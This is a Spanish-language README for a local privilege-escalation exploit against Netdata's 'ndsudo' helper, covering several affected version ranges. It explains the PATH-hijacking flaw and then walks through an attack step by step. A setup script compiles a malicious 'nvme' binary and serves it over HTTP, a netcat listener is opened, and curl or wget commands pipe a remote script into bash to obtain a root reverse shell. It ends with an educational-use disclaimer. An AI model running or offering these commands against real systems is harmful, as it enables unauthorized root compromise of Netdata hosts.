
Script de Bash para escalada de privilegios mediante "ndsudo" (Exploit local de Netdata)
Script Bash para escalada de privilegios mediante "ndsudo" (Exploit Local de Netdata)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
La herramienta "ndsudo" ejecuta un conjunto restringido de comandos externos, pero las rutas de búsqueda son proporcionadas por las variables de entorno "PATH".
Al cambiar la variable de entorno "PATH" a una ruta a la que tengamos acceso, podemos controlar dónde ndsudo busca los comandos y crear uno que contenga código malicioso.
Este exploit se basa en el supuesto de que la máquina objetivo y la máquina atacante están en la misma red.
Podemos generar e implementar automáticamente el archivo necesario para el ataque ejecutando "setup_exploit_server.sh"
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
Este script creará todos los archivos necesarios para el ataque configurados con tu dirección IP.
Después de implementar nuestro servidor web, iniciamos un listener en otra shell:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
Dependiendo de nuestro cliente HTTP, podemos descargar y ejecutar nuestro exploit.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
Si todo se hizo correctamente, ahora deberíamos tener una shell de root.

Esta prueba de concepto es solo para fines educativos y de pruebas autorizadas.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal.
Los autores no se hacen responsables del mal uso de esta información.